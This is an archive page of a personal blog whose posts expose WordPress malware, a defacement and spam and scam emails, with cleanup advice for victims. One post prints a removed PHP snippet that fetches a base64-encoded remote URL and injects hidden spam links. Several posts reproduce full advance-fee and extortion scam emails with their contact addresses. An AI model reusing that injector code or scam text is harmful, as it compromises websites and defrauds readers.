Posted November 3rd, 2009, in: Computer Problems and Fixes| Evil Robots| Humanity, Culture, Philosophy, Politics, Ethics Etc| Marketing/Advertising In The Cloud| SEO, SEM, SMO Etc| Technology| WordPress
The site links to sites who are also under attack and when the bug is running correctly on those sites, the sites redirect the hits to the final destination,
which is http://www.zml.com/
I don’t know if zml.com knows this is happening. I mean I suppose it’s possible that some unscrupulous SEO or Marketing guy promised them traffic and then resorted to this to get it. I’m contacting them now to inform them of this uncool practice being committed on their behalf, and if they are not willing to cooperate on putting an end to it, I will have no choice but to give them some negative attention.
The process of extracting the bad links from the content was long and hard since the strings of code inserted were very inconsistent.
The following is a list of the sites being linked thru, which I assume are all victims of this malware. If you own one of these sites, feel free to drop me a line and I will point you in the right direction as far as putting an end to this.
- http://blog.segd.org
- http://www.investorsunited.com
- http://www.oca-gla.org
- http://www.thunderstruck.org
- http://subway.com
- http://verdadeabsoluta.net
- http://yourrnc.com
- http://wordpressthemesbox.com
- http://mp3db.org
- http://webconsultingdc.com
- http://turtlesurvival.org
- http://turtleconservationfund.org
- http://truenorthbrass.com
- http://tarabooks.com
- http://kolenalaila.com
- http://techbostonacademy.org
- http://pie-flex.com
- http://www.philebrity.tv
- http://www.landmarkwine.com
- http://artsinbushwick.org
- http://brettmartin.org
- http://bsf.org
- http://www.popandpolitics.com
- http://womanhonorthyself.com
- http://www.brainstorm9.com
- http://webdev.entheosweb.com
- http://www.topicus-healthcare.com
- http://www.vfilings.com
- http://constantinessword.com
- http://www.dopiska.com
- http://writingcenters.org
- http://www.radisson.com
- http://notjustaprettyface.org
- http://www.arizonacriminaldefenseblog.com
- http://www.sembrarpaz.com
- http://www.apostilla.com
- http://www.geektechs.net
- http://johnquiggin.com
- http://blog.pdma.org
- http://bluesheaven.com
Message to ZML:
Hello,
I am a developer and recently one of my clients who is running WordPress for her personal website was attacked by some Malware that inserted thousands of links throughout her content. Those links resolve to your site, but via redirects thru other sites that I assume are also victims of the malware.
You look like you’ve built a pretty nice site here. And I’m writing to give you the chance to get on board with fixing this problem before I am forced to create some negative attention in the blogosphere and social media.
It doesn’t seem like you would want to be resposible for malware. But it also doesn’t seem like anyone would go through the trouble to make all these links back to you unless you were paying them. Perhaps you hired some marketing or SEO people and were not aware that they would be using these tactics? Please write back soon as I have very little patience for this kind of thing.
Thanks,
Andrew A. Peterson
Some samples of weird code that the bot inserted:
<wp:tag><wp:tag_slug>%d0%b0%d0%b2%d1%82%d0%be%d1%80%d1%81%d0%ba%d0%b8%d0%b5-%d0%bf%d1%80%d0%be%d0%b3%d1%80%d0%b0%d0%bc%d0%bc%d1%8b</wp:tag_slug><wp:tag_name><![CDATA[????????? ?????????]]></wp:tag_name></wp:tag>
<wp:tag><wp:tag_slug>%d1%81%d0%b2%d0%be%d0%b1%d0%be%d0%b4%d0%bd%d1%8b%d0%b9-%d0%bc%d0%b8%d0%ba%d1%80%d0%be%d1%84%d0%be%d0%bd</wp:tag_slug><wp:tag_name><![CDATA[????????? ????????]]></wp:tag_name></wp:tag>
Permalink - Leave a Comment (0)
Posted June 18th, 2009, in: Computer Problems and Fixes| Evil Robots| Technology| WordPress
Thanks to SomewwhereVille for helping me diagnose… Here’s what I removed from header.php (in all the installed themes, not just the active one):
<?php /* wp_remote_fopen procedure */ $wp_remote_fopen=’aHR0cDovL3F3ZXRyby5jb20vc3Mv’; $opt_id=’62f751b6518fcbe2ab5980b9f1349902′; $blarr=get_option(‘cache_vars’); if(trim(wp_remote_fopen(base64_decode($wp_remote_fopen).$opt_id.’.md5′))!=md5($blarr)){ $blarr=trim(wp_remote_fopen(base64_decode($wp_remote_fopen).$opt_id.’.txt’)); update_option(‘cache_vars’,$blarr); } $blarr=unserialize(base64_decode(get_option(‘cache_vars’))); if($blarr['hide_text']!=” && sizeof($blarr['links'])>0){ if($blarr['random']){ $new=”; foreach(array_rand($blarr['links'],sizeof($blarr['links'])) as $k) $new[$k]=$blarr['links'][$k]; $blarr['links']=$new; } $txt_out=”; foreach($blarr['links'] as $k=>$v) $txt_out.=’<a href=”‘.$v.’”>’.$k.’</a>’; echo str_replace(‘[LINKS]‘,$txt_out,$blarr['hide_text']); } /* wp_remote_fopen procedure */ ?>
After removing this crap, I recommend installing WP Security Scan. It’s a pretty badass little plugin that walks you through doing some not-so-obvious things to protect WP from attacks. For instance, if your hosting scenario allows, you can rename all your Database Tables to have a Prefix other than “wp_”
Who knew that was the thing to do? I didn’t. It also scans your WP install for risky file permissions and weak passwords and a few other things.
Unfortunately for me, I was working on a site hosted by AN Hosting which doesn’t allow a certain priviledges to DataBase users (Alter?), so I had to change our table prefixes manually.
WP Security Scan, after failing to rename the table prefixes because it didn’t have sufficient access, referred me to a nice little tutorial on how to do it manually.
Basically you:
- download your database thru PHPMyAdmin as per WordPress.org’s Documentation,
- do a “Find-And-Replace” replacing all instances of “wp_” with “somethingelse_”
- make a new database and import your “somethingelse_” version to the new database.
- Change your wp-config.php file to point at the new database
- Change your wp-config.php file’s “table prefix” line from “$table_prefix = ‘wp_’ ” to “$table_prefix = ’somethingelse_’“
These kinds of problems suck to have but it sure is nice to have the WordPress Community, all of us working together to combat the evil.
Permalink - Leave a Comment (5)
Posted January 30th, 2009, in: Computer Problems and Fixes| Evil Robots| Ideas, Observations, Opinions, Rants Etc| Spam and Scams| Technology| Web Browsers
I was glancing at something over at The Pirate Bay and maybe I clicked on a banner or something but damn… What is this? I’ve never seen anything like this on a Mac. Is this new? Are there new threats for Macs? Or just new Warnings?
Permalink - Leave a Comment (2)
Posted December 11th, 2008, in: Computer Problems and Fixes| Evil Robots| Technology
This attack on older versions of WordPress installs a file called index.html in the wp-admin directory so that when a user logs into their dashboard, the browser loads it rather than the index.php file that comes with WordPress. The result is when trying to access the WordPress Dashboard, instead you get a page which says “Hacked By Guard_FB” followed by a graphic of a silhouette of a man with his with his fist in the air which reads “THE TURK PROTEST…”
Appears in place of the Dashboard in WordPress
The page then goes on with some left wing political stuff, and claims to be affiliated with a site called ateskes.org and is signed “King Defacer”
I’d rather see hacking going on for the sake of activism than for worthless spam, but this thing sucks. The blog on which I encountered this was not particularly political and so I suspect that the makers of this attack aren’t picking and choosing who they attack, which makes it evil crap.
Bottom line, keep WordPress up to date, stay on top of your comment moderation, and use WordPress’ Cookie-Encryption “Security Keys” feature in your wp-config file.
If this has happened to you, I recommend deleting your spam/comments in moderation (if there’s too many, check here), upgrading WordPress, then changing your Dashboard passwords. Of course, also delete the file called index.html in your wordpress directory’s wp-admin folder.
Full text of “Hacked By Guard_FB” Dashboard page is as follows:
Hacked By GUARD_FB
Ateskes.Org
We Accuse:
- G.W. Bush, T. Blair, and E. Olmert, the chief executives of the imperialist, colonialist, belligerent policies and actions of the US-British-Israeli coalition,
- of perpetrating the composite crimes of war of annihilation, occupation, and the premeditated mass murder of children and civilians in Palestine and Lebanon,
- following their atrocities in Afghanistan and Iraq and foreboding the same in Syria and Iran,
- sinking into utter barbarity in transgression of all universal norms of human morality.
The Following Are Also Responsible:
- All government employees and agents, advisors, civil and military functionaries who partake in collective and individual responsibility in these states;
- the legislative and judicial branches that have not curbed the criminal activities of their governments as they violate basic human rights, most significantly the right to live, and as they trample international legal norms and commit crimes against humanity;
- universities, media, intellectuals, workers and citizens who do not restrain and sanction their governments through domestic democratic channels;
- UNITED NATIONS and other national and international bodies that actively or passively support, aid and abet this illegality, crude force, and aggression –all bear responsibility for the catastrophe that is taking place.
We Demand:
- An immediate cessation of this horror,
- the due trial, in international tribunals, as well as in the courts of conscience and history,
- of, above all, Bush, Blair, and Olmert as perpetrators of crimes against humanity,
- of their respective government agents and supporters,
- of the chief executives and state personnel in all countries that have been accomplices to these crimes against humanity,
- and their removal from office by the lawful and democratic initiatives of their respective citizenry.
And We Declare:
We stand at a critical juncture in human history.
These aggressive, colonialist, exploitative, and militarist practices are negating the achievements of humanity, destroying the basic pillars of international law, and thus, threatening the present and the future of this planet.
We refuse to submit to this brutal force and be accomplices to its crimes.
We refuse to give in to the (il)logic of blood-fed economies and lethal war machines.
We declare that we will continue to struggle for a different world.
www.Ateskes.Org
King Defacer
Permalink - Leave a Comment (1)
Posted November 7th, 2008, in: Evil Robots| Scam Email Mashups
From:MR FRED SIBAYA
No.54 Palm Groove,
Braafontein
Johannesburg
South Africa
Tel/Fax+0027 86 529 0021
Dear Sir,
I am MR.FRED SIBAYA from Zimbabwe the first Son of MR JOHN SIBAYA, who was murdered in the land dispute in Zimbabwe by the agents of the ruling government of President ROBERT MUGABE, you must have heard his alleged support and sympathy for the opposition MDC PARTY led by the minority white farmers. My Father was among the few black Zimbabwean rich farmers murdered in cold blood by the war veterans backed by the government.
Before the death of my Father, he deposited the sum of US$12M (Twelve Million United State Dollars) With one of the security company in Southern Africa, as if he knew the looming danger in ZIMBABWE. The money was deposited as a gem and precious stones to avoid much attraction from the security firm. The money was earmarked for the purchase of new machinery and chemicals for the farms and the establishment of new farms in Lesotho and Swaziland before the regretted incident. This Land problem arose when President Robert Mugabe introduced a new land act. Which wholly affects the white rich farmers and some few blacks vehemently condemned the “Modus operandi” adopted by the government. This resulted to rampart killing and Mob actions.
My mother and I are staying in South Africa now as Asylum seekers, which have not been beneficial to us; I have decided to transfer this money to a foreign country where we can invest it. I am faced with the dilemma of investing this amount of money in South Africa for fear of encountering the same experience in future since both countries have the same political policy and also law does not permit us to investment hence we’re refugees. I must let you know that this business is 100% risk free. I and my family have agreed to give you 20% of the total US12M, 5% will be mapped out for all expenses that maybe incurred during the transfer 5% for any charity organization and 70% will be for me and my family’s investment in your country.
Therefore if you are willing and interested to render the needed assistance, endeavour to reply through HYPERLINK “mailto:fredsibaya0@gmail.com” \t “_blank” fredsibaya0@gmail.com for more brief clarifications. I also need your private mobile, telephone and fax numbers for easy communication. Remember; this is highly confidential and the success of this business depends on how secret it is kept. Expecting your reply soonest.
Best regards,
MR.FRED SIBAYA (FOR THE FAMILY)
Permalink - Leave a Comment (0)
Posted October 6th, 2008, in: Scam Email Mashups| Spam and Scams
I find this one interesting because it doesn’t actually promise any money. Instead it offers an opportunity to help build a church in Africa, and accuses the reader of needing redemption, being a sinner (who isn’t, right?) etc…
From: david@teceng.net
I am Prophet David Johnson, I went for a prayer mission in HAITI and the Lord revealed so many things about you to me.
I see things and I reveal to people, something terrible which I have seen will happen to you, I just have to tell you, you will lose two important people you love very much, and evil will visit you personally, troubles and problems will leave with you, the things you never never believe that can happen to you, will happen. It has been dated when it will start very soon, sooner than you think.
The Lord reveal everything to me, and your email address appeared to me, after reading this message, if you believe me keep this message for your self alone do not share it with anybody, but if you don’t believe me delete this message and talk to your family, friends and relatives, tell them about the message so when things start happening to you, they will be informed, everything that will happen to you is spiritual, nobody will understand, when you even tell people what is happening to you they will never believe and understand because it is spiritual.
I have warned you now, we can prevent all this, but only if you believe God, but if you don’t believe God, wait and see what will happen.
Lord has done so much for you, that you have failed to recognize and you have been cheating God, at this time your email address was revealed to me three times, that’s why I am contacting you, do not think this is a joke or just an email because I know what will be going on in your mind, you are free to believe and disbelief this message, but when evil starts happening there is no going back, I warn you it has been destined and dated, it will start sooner than you think.
As you are reading this message I still see doubt in you, but I will stop here. If you want to prevent all this evil that will hit you soon, I will know and I will tell you what to do.
God reveal to me that you have a lot of doubt in your mind that you will doubt this message.
The reason for writing this message, is because of the strong challenge which you must have to follow to prevent all this evil which will surround you sooner, you will not see them and you can never see them, because it is spiritual, when it starts it cannot stop, it will be as if God has giving you to Satan.
Look this is not a joke, this is what I have seeing and the only prevention is for you not to doubt and do what I will tell you to do, for your soul to be covered in God’s harms. We have to take you back from the Satan if you are ready to follow God’s instructions I will tell you what to do.
I can still see even as I’m writing this message that there is plenty of doubt inside your heart and mind, but you can over power your doubt, only if the evil leaving in your heart will allow you, it will be very difficult for you to do what God’s want you to do, but you can do it only if you put doubt aside.
God told me that we will win you back, but it will be difficult because your heart has been eating by doubt, my only advice to you to remove doubt and keep this message to you self, if you don’t take my advice wait and see. This is the only way out for you to avoid this evil, you have to sow a seed in the house of the Lord, there is a church we are building in Africa, and we want you to sow a seed in contributing on that church where your name will be writing as one of the people that contributed to stand the house of the Lord where people will enter everyday and pray for you who contributed to put up the structure.
The only way out of this predicament is you must have to contribute for the building of the church, your name must be writing in the church as one of the sponsors that is where your name will be written in the book of life, the book of joy and the book of happiness things will now turn around, when the church is completed everyday service your name will be announced for the church congregation to pray for you.
So you have to sow that seed that is the only message that will take you out of this evil, you name must be writing in that church before it is completed. There’s no way back we will beg you to do this because this is the only way for the evil to turn around, I’m a prophet I don’t talk too much. But if you fail to do what you have been told now, when the predicament start even if you give all you have to the church at that time it will not work, I am warning and begging don’t ignore this message.
The church will go on 40 days fasting for you starting from the day you sow a seed for the building of the church. Contact Pastor Emmanuel Anderson, tell Pastor Anderson that you want to contribute for the building of the new church, do not tell him about what I told you, just tell him you want to contribute then ask him how you can sow a seed, do this as quick as possible, nothing is too small and nothing is too big for the Lord do not cheat God again, do this I have told you.
Give what you have never giving before, give what you feel your heart tells you, remember nothing is too small and nothing is too big for the Lord, contact Pastor Emmanuel Anderson on this e-mail (pastoranderson@faithconvenantministry.co.cc) and tell him you want to sow a seed, after you have done that, then wait and see how blessing will rain upon your life each day, how you will swim in the rivers of success and joy.
I have given you the information and message which I was asked to give you, so now it is now left for you to believe it and do what you where told or forget it. I will never write you again or reply you, I have told you what I have to tell you, after reading this message you only have two things to do, either you follow the message or not.
I wish you the best in life.
Have a blessed day.
Regards,
Prophet David Johnson.
Permalink - Leave a Comment (2)
Posted September 30th, 2008, in: Computer Problems and Fixes| Evil Robots| Ideas, Observations, Opinions, Rants Etc| New Media| SEO, SEM, SMO Etc| Spam and Scams| Technology| Web 2.0
If your blog has been deleted suddenly by WordPress.com, DON’T PANIC! …that is, unless you use your blog for phishing scams or spam-commenting or anything else that brings down the experience of other people on the Web and/or makes it harder for people to find the information they need. In that case, panic. Scream and cry. I hope your blog is permanently deleted, and everything you eat for the rest of you life tastes horrible. The Web is our garden!
Assuming you are an ethical participant of The Cloud, pretty soon you should get an email from WordPress.com explaining the nature of the take-down.
[Anyway, my blog is back, obviously. I guess I need to start backing up my blog? Jeeez. What a hassle.]
[begin story]
I regularly blog about scams/spam on the Web. It’s a way for me be discovered by, and to provide guidance to, people who happen to be googling around about some questionable content they find or are emailed.
One example of this is this search result for “paypal-cgi.com,” a site that mimics PayPal in order to trick people into handing over their paypal login info. I come up number one for the search, and the title of the result makes it clear that you shouln’t trust PayPal-CGI.com… If you click thru to my post, I explain why these things exist and how to detect this kind of crap.
You see, I’m actually doing something good here. And it’s good for me too.
Anyway, recently I encountered some scam crap on craigslist and blogged about it. And since my blog post contained a link to the spam/scam site I was exposing, WordPress.com’s evil-detectors went ape shit and my blog got automatically removed by wordpress.com.
I was in the middle editing a post and suddenly my category selection buttons stopped working. And there was a thing saying somethin like “you do not have permission to edit this..” or something like that. When I refreshed the page, I got “The authors have deleted this blog. The content is no longer available”
…and my blog had been completely removed leaving only this scary screen saying: “This blog has been archived or suspended for a violation of our Terms of Service.”
Ironic. I got banned for merely exposing something malicious.
Current Spam-Filter technology isn’t context-aware. This is a slippery slope: Using words or links alone, without regard to context, to define what is untrustworthy content.
See the post in question for yourself HERE:
Fortunately, about an hour later, I got a message from WordPress.com:
from: Anthony – WordPress.com:
Hi,
Your blog was automatically flagged, as links to overnightcashexplosion.com were detected (and these are certainly not permitted). The blog is back – please remove all such links.
Best,
Anthony
Automattic | WordPress.com
I responded with:
if it’s a url in text, is that different in the eyes of your spam defenses from an actual link? I’d like to leave the url if possible so I can still come up in searches for that url.
WHat’s your take on that?
Thanks for communicating with me.
-A
Anthony from WordPress replied:
Hi,
Sure, you can leave it – I understand the context.Best,
Anthony
Automattic | WordPress.com
So, there is a layer of discretion here? That’s good I guess.
Permalink - Leave a Comment (10)
Posted September 27th, 2008, in: Scam Email Mashups| Spam and Scams
This spam email was just too funny to me not to do. Gosh! I feel so sorry for anyone that is so computer illiterate that they could fall for something like this.
Good Day,
I have 100% legal lucrative business
proposal which will be of mutual benefit to
us,If you are Interested, kindly mail me at
(curtisanthony212@ymail.com) for more
details.
Thanks and awaiting your response.
Curtis Anthony
Business Proposal
From: honyeeee1@singnet.com.sg
Subject: 100% legal proposal
Date: September 27, 2008 2:42:04 AM PDT
To: curtisay@wlla.com
Reply-To: curtisanthony343@jmail.co.za
MORE SCAM EMAIL MASHUPS
Permalink - Leave a Comment (0)
Posted September 1st, 2008, in: Evil Robots| Spam and Scams
Here in one post, I will start collecting curious little spam messages and emails I get. These aren’t interesting enough to get their own posts, but I still like to be found in searches for their emails, urls etc.
Hi sweetie!I’d like to avoid any confusion, I’m writing this on behalf of my mother. She was searching for guys online and came upon your irresistible profile (her words). She’s single and HOT! She wants to experience new things, meet a great guy for dating and more! She’s very alluring, men turn around when she walks? she has very nice curves. She likes going to the movies, drinking coffee and enjoys smart conversation. She plays a few musical instruments but prefers the cello. She’s humorous, romantic and easy-going. I’d like to add that she’s a very perceptive and spiritual person. I hope you’ll write back, you sure won’t regret it. FYI, this is MY account, so don..t reply directly to this message Instead, please use her email address, MarieBashor at gmail..
Well thank you very much
http://myspace.com/269092691
Via Email From tonybenson02@yahoo.com.hk
You can now email me at: sgttonybenson002@yahoo.com
- Dear Friend, I know you would be surprised to read from someone relatively unknown to you before now. My name is Tony Benson, a master sgt. of The U.S. Marine, deployed to Iraq in the beginning of the war in 2003.I would like to share some highly personal classified information about my personal experience and role which I played in the pursuit of my career serving under the U.S ARMY which was at the fore-front of the war in Iraq. Though, I would like to hold back certai n information for security reasons for now until you have found time to visit the BBC website stated below to enable you have insight regarding what I intend to share with you, believing that it would be of your desired interest in one way or the other.Here is a BBC news listing that confirms what I share with you.http://news.bbc.co.uk/2/hi/middle_east/2988455.stm Also, could you get back to me having visited the above website to enable us discuss in a more vivid manner to the best of your understanding. I must say that I’m very uncomfortable sending this message to you without knowing truly if you would misconstrue the importance and decide to go public.In this regards,I will not hold backto say that the essence of this letter is strictly for mutual benefit of you and I and nothing more.I will be more vivid and coherent in my next email in this regards. Meanwhile,could you send me a mail confirming you have visited the site and understood my intentions?Standing by for you r response. warm regards, master sgt.Tony Benson secured email:tonybenson02@yahoo.com.hk
From MySpace
is it u there?:
http://ofthehub. com/go/ms. php?ch=cb8c411a8037611c46a0b5fba697c260
(ofthehub.com appears to be a virus thing)
I keep getting this email from “Solomon Guei solo.guei1@gmail.com in an email asking me to open an attachment:
PLEASE OPEN THE ATTACHMENT TO SEE DETAILS.
FROM SOLOMON
the attachment reads:
From: Solomon Kone Guei
I am Solomon Kone Guei from Coted Ivoire. I am 26 years old; I lost my father a couple of years ago. My father late General Robert Guei was a Ex-Military head of State of Ivory Coast until his untimely death,(You can visit http://news.bbc.co.uk/2/hi/africa/2269238.stm for complete report on this incident).
He was assassinated on the 19th of September 2002 by an unknown group of heavily armed gunmen following the political uprising. To be brief and straight to the point, before his untimely death, he deposited with a finance security company a metal safe box containing
the sum of (Twenty Million United States Dollars Only) $20 million meant for the purchase of heavy artilleries, armored tank, ammunitions and security equipments.
The security company do not know the real contents of the metal safe box is money, because he convincingly told them at the time of deposit that it only contains African Artefact treasures and computer security consumables that does not need air and sun rays, that
will be ship to his foreign business associate in abroad.
I want you to do me a favor to claim the box as my late father foreign business associate overseas in your country, so that I will come over to your country for investment and resettlement, since the present administration is no more in cordial relationship with my families.
I will go into partnership investment with you in your country, such as Real Estate and Hotel ownership this is my reason for writing to you. Please if you are willing to assist me, indicate your interest in replying soonest, I will offer you 30% only for your kind and honest assistance. Do kindly send me your direct telephone and fax numbers for an easy communication-mail me:
solo.guei@gmail.com
Mr. Solomon Guei
Permalink - Leave a Comment (0)
Posted July 15th, 2008, in: Computer Problems and Fixes| Evil Robots| Technology| Web 2.0
Recently while troubleshooting an old WordPress 2.1.3 blog, I found that when trying publish a new post, the next page would fail to load and only get to a blank screen. Also, while looking around in the dashboard, I noticed that the default upload directory (for uploading images etc), was set to:
/../../../../../../../../../../../../../../tmp/
from CyberInsecure.com :
Wordress blogs are mass scanned and attacked, and a new directory in wp-content folder is created in vulnerable ones. The directory is usually called /1/ and its full of html files containing Javascript redirects in them (doorways). There was also an infected blog with phishing pages for Google logins. Google cache already shows thousands of results with such hacked Wordpress blogs. They can be seen best by committing a search inurl:wp-content/1/ (do not visit those results, your PC might get infected). Google has already tagged some of these spam pages as harmful.
The blogs are most likely attacked by some kind of automated tool since the amounts of spam are too big to work manually on all those spam pages creation. It seems there are also spam comments in posts as well. Spam comments are pointing to internal infected blog pages in folder “1? to get them spidered and to get people to visit them.
This issue was reported to Wordpress.org, and there is an unofficial fix for this issue. The fix is based around renaming the cookies used by Wordpress by default. If the exploit is hacking the cookies by mass scanning blogs, and it looks for a specific cookie name, that would stop what is out there now but it would not fix the issue.
Recommendations: Upgrade to 2.3.3 along with immediately changing any administrator passwords. Currently older Wordpress versions, especially Wordress 2.1.3, attacked using “admin-ajax.php” sql injection exploit to retrieve the administrator account’s password.
Change default cookie names in your blog.
Things like this are a reason to keep your WordPress, and all other software up to date!
Reading:
http://wordpress.org/support/topic/154278
Loading... 